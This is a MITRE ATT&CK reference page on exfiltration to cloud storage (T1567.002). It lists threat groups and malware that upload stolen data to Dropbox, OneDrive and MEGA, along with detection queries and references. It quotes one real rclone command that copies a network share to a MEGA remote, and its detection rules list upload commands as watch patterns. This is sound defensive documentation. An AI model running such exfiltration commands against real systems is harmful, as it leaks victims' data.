Exfiltration Over Web Service: Exfiltration to Cloud Storage, Sub-technique T1567.002 - Enterprise | MITRE ATT&CK®

Exfiltration Over Web Service: Exfiltration to Cloud Storage, Sub-technique T1567.002 - Enterprise | MITRE ATT&CK®
Currently viewing
ATT&CK v17.1
which was live between April 22, 2025 and October 27, 2025.
Learn more about the versioning system
or
see the live site
Techniques
Enterprise
Exfiltration Over Web Service
Exfiltration to Cloud Storage
Exfiltration Over Web Service:
Exfiltration to Cloud Storage
Other sub-techniques of Exfiltration Over Web Service (4)
ID
Name
T1567.001
Exfiltration to Code Repository
T1567.002
Exfiltration to Cloud Storage
T1567.003
Exfiltration to Text Storage Sites
T1567.004
Exfiltration Over Webhook
Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.
Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service.
ID:
T1567.002
Sub-technique of:
T1567
Tactic:
Exfiltration
Platforms:
ESXi, Linux, Windows, macOS
Version:
1.3
Created:
09 March 2020
Last Modified:
15 April 2025
Version Permalink
Live Version
Procedure Examples
ID
Name
Description
G1024
Akira
Akira
will exfiltrate victim data using applications such as
Rclone
[1]
C0040
APT41 DUST
APT41 DUST
exfiltrated collected information to OneDrive.
[2]
S0635
BoomBox
BoomBox
can upload data to dedicated per-victim folders in Dropbox.
[3]
S0651
BoxCaon
BoxCaon
has the capability to download folders' contents on the system and upload the results back to its Dropbox drive.
[4]
C0015
C0015
During
C0015
, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the
Rclone
command
rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M
[5]
G0114
Chimera
Chimera
has exfiltrated stolen data to OneDrive accounts.
[6]
G1021
Cinnamon Tempest
Cinnamon Tempest
has uploaded captured keystroke logs to the Alibaba Cloud Object Storage Service, Aliyun OSS.
[7]
S0660
Clambling
Clambling
can send files from a victim's machine to Dropbox.
[8]
[9]
G0142
Confucius
Confucius
has exfiltrated victim data to cloud storage service accounts.
[10]
S1023
CreepyDrive
CreepyDrive
can use cloud services including OneDrive for data exfiltration.
[11]
S0538
Crutch
Crutch
has exfiltrated stolen data to Dropbox.
[12]
G1006
Earth Lusca
Earth Lusca
has used the megacmd tool to upload stolen files from a victim network to MEGA.
[13]
G1003
Ember Bear
Ember Bear
has used tools such as
Rclone
to exfiltrate information from victim environments to cloud storage such as
mega.nz
[14]
S0363
Empire
Empire
can use Dropbox for data exfiltration.
[15]
G0046
FIN7
FIN7
has exfiltrated stolen data to the MEGA file sharing site.
[16]
G0125
HAFNIUM
HAFNIUM
has exfiltrated data to file sharing sites, including MEGA.
[17]
S0037
HAMMERTOSS
HAMMERTOSS
exfiltrates data by uploading it to accounts created by the actors on Web cloud storage providers for the adversaries to retrieve later.
[18]
G1001
HEXANE
HEXANE
has used cloud services, including OneDrive, for data exfiltration.
[11]
G0119
Indrik Spider
Indrik Spider
has exfiltrated data using
Rclone
or MEGASync prior to deploying ransomware.
[19]
G0094
Kimsuky
Kimsuky
has exfiltrated stolen files and data to actor-controlled Blogspot accounts.
[20]
G0065
Leviathan
Leviathan
has used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox.
[21]
[22]
G1014
LuminousMoth
LuminousMoth
has exfiltrated data to Google Drive.
[23]
S0340
Octopus
Octopus
has exfiltrated data to file sharing sites.
[24]
S1170
ODAgent
ODAgent
can use an attacker-controlled OneDrive account for exfiltration.
[25]
S1172
OilBooster
OilBooster
can exfiltrate files to an actor-controlled OneDrive account via the Microsoft Graph API.
[25]
C0022
Operation Dream Job
During
Operation Dream Job
Lazarus Group
used a custom build of open-source command-line dbxcli to exfiltrate stolen data to Dropbox.
[26]
[27]
S1102
Pcexter
Pcexter
can upload stolen files to OneDrive storage accounts via HTTP
POST
[28]
G1005
POLONIUM
POLONIUM
has exfiltrated stolen data to
POLONIUM
-owned OneDrive and Dropbox accounts.
[11]
S0629
RainyDay
RainyDay
can use a file exfiltration tool to upload specific files to Dropbox.
[29]
S1040
Rclone
Rclone
can exfiltrate data to cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA.
[30]
[5]
S0240
ROKRAT
ROKRAT
can send collected data to cloud storage services such as PCloud.
[31]
[32]
G1015
Scattered Spider
Scattered Spider
has exfiltrated victim data to the MEGA file sharing site.
[33]
[34]
G0027
Threat Group-3390
Threat Group-3390
has exfiltrated stolen data to Dropbox.
[8]
G1022
ToddyCat
ToddyCat
has used a DropBox uploader to exfiltrate stolen files.
[28]
G0010
Turla
Turla
has used WebDAV to upload stolen USB files to a cloud drive.
[35]
Turla
has also exfiltrated stolen files to OneDrive and 4shared.
[36]
G0102
Wizard Spider
Wizard Spider
has exfiltrated stolen victim data to various cloud storage providers.
[37]
G0128
ZIRCONIUM
ZIRCONIUM
has exfiltrated stolen data to Dropbox.
[38]
Mitigations
ID
Mitigation
Description
M1021
Restrict Web-Based Content
Web proxies can be used to enforce an external network communication policy that prevents use of unauthorized external services.
Detection
ID
Data Source
Data Component
Detects
DS0017
Command
Command Execution
Monitor for execution of cloud storage CLI tools (rclone, gdrive, aws s3 cp, azcopy, gsutil), use of PowerShell, Bash, or Python scripts to upload files to cloud storage, or attempts to obfuscate file uploads via scripting (e.g., Base64 encoding before upload).
Analytic 1 - Detecting File Upload to Cloud Storage via CLI Tools
(EventCode=1 OR source="/var/log/audit/audit.log" type="execve")| where (command IN ("rclone copy", "aws s3 cp", "gsutil cp", "azcopy copy", "curl -T", "wget --post-file"))| eval risk_score=case( command IN ("rclone copy", "aws s3 cp"), 9, command IN ("curl -T", "wget --post-file"), 8)| where risk_score >= 8| stats count by _time, host, user, command, risk_score
DS0022
File
File Access
Monitor for files being accessed to exfiltrate data to a cloud storage service rather than over their primary command and control channel.
Analytic 1 - Detecting File Staging Before Cloud Storage Upload
(EventCode=11 OR EventCode=4663 OR source="/var/log/audit/audit.log" type="open")| where (file_path IN ("/tmp/
", "/var/tmp/
", "/home/
/Downloads/
", "C:\Users\
\Documents\exfil"))| eval risk_score=case( file_path LIKE "/tmp/%", 9, file_path LIKE "C:\Users\
\Documents\exfil", 8)| where risk_score >= 8| stats count by _time, host, user, file_path, risk_score
DS0029
Network Traffic
Network Connection Creation
Monitor for unusual outbound connections to cloud storage domains, processes sending significantly more data than they receive, or high-bandwidth file transfers to cloud services.
Analytic 1 - Detecting Large Data Transfers to Cloud Storage
(EventCode=3 OR source="zeek_conn.log" OR source="firewall_logs")| where (dest_ip IN (known_cloud_services) AND bytes_out > 5000000)| stats count, sum(bytes_out) as total_bytes by _time, host, process, dest_ip| where total_bytes > 50000000| eval risk_score=case( total_bytes > 100000000, 9, total_bytes > 50000000, 8)| where risk_score >= 8| table host, dest_ip, total_bytes, risk_score
Network Traffic Content
Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).
Network Traffic Flow
Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Monitor for cloud storages for data exfiltration.
References
Secureworks. (n.d.). GOLD SAHARA. Retrieved February 20, 2024.
Mike Stokkel et al. (2024, July 18). APT41 Has Arisen From the DUST. Retrieved September 16, 2024.
MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021.
CheckPoint Research. (2021, July 1). IndigoZebra APT continues to attack Central Asia with evolving tools. Retrieved September 24, 2021.
DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.
Jansen, W . (2021, January 12). Abusing cloud services to fly under the radar. Retrieved September 12, 2024.
Biderman, O. et al. (2022, October 3). REVEALING EMPEROR DRAGONFLY: NIGHT SKY AND CHEERSCRYPT - A SINGLE RANSOMWARE GROUP. Retrieved December 6, 2023.
Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021.
Chen, T. and Chen, Z. (2020, February 17). CLAMBLING - A New Backdoor Base On Dropbox. Retrieved November 12, 2021.
Lunghi, D and Horejsi, J. (2018, February 13). Deciphering Confucius: A Look at the Group's Cyberespionage Operations. Retrieved December 26, 2021.
Microsoft. (2022, June 2). Exposing POLONIUM activity and infrastructure targeting Israeli organizations. Retrieved July 1, 2022.
Faou, M. (2020, December 2). Turla Crutch: Keeping the “back door” open. Retrieved December 4, 2020.
Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.
US Cybersecurity & Infrastructure Security Agency et al. (2024, September 5). Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure. Retrieved September 6, 2024.
Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.
Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.
MSTIC. (2021, March 2). HAFNIUM targeting Exchange Servers with 0-day exploits. Retrieved March 3, 2021.
FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved November 17, 2024.
Mandiant Intelligence. (2022, June 2). To HADES and Back: UNC2165 Shifts to LOCKBIT to Evade Sanctions. Retrieved July 29, 2024.
An, J and Malhotra, A. (2021, November 10). North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets. Retrieved December 29, 2021.
Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018.
FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.
Botezatu, B and etl. (2021, July 21). LuminousMoth - PlugX, File Exfiltration and Persistence Revisited. Retrieved October 20, 2022.
Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021.
Hromcova, Z. and Burgher, A. (2023, December 14). OilRig’s persistent attacks using cloud service-powered downloaders. Retrieved November 26, 2024.
Breitenbacher, D and Osis, K. (2020, June 17). OPERATION IN(TER)CEPTION: Targeted Attacks Against European Aerospace and Military Companies. Retrieved December 20, 2021.
ClearSky Research Team. (2020, August 13). Operation 'Dream Job' Widespread North Korean Espionage Campaign. Retrieved December 20, 2021.
Dedola, G. et al. (2023, October 12). ToddyCat: Keep calm and check logs. Retrieved January 3, 2024.
Vrabie, V. (2021, April 23). NAIKON – Traces from a Military Cyber-Espionage Operation. Retrieved June 29, 2021.
Nick Craig-Wood. (n.d.). Rclone syncs your files to cloud storage. Retrieved August 30, 2022.
Jazi, Hossein. (2021, January 6). Retrohunting APT37: North Korean APT used VBA self decode technique to inject RokRat. Retrieved March 22, 2022.
Cash, D., Grunzweig, J., Adair, S., Lancaster, T. (2021, August 25). North Korean BLUELIGHT Special: InkySquid Deploys RokRAT. Retrieved October 1, 2021.
CISA. (2023, November 16). Cybersecurity Advisory: Scattered Spider (AA23-320A). Retrieved March 18, 2024.
Microsoft. (2023, October 25). Octo Tempest crosses boundaries to facilitate extortion, encryption, and destruction. Retrieved March 18, 2024.
Symantec DeepSight Adversary Intelligence Team. (2019, June 20). Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments. Retrieved July 8, 2019.
Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020.
Shilko, J., et al. (2021, October 7). FIN12: The Prolific Ransomware Intrusion Threat Actor That Has Aggressively Pursued Healthcare Targets. Retrieved June 15, 2023.
Singh, S. and Antil, S. (2020, October 27). APT-31 Leverages COVID-19 Vaccine Theme and Abuses Legitimate Online Services. Retrieved March 24, 2021.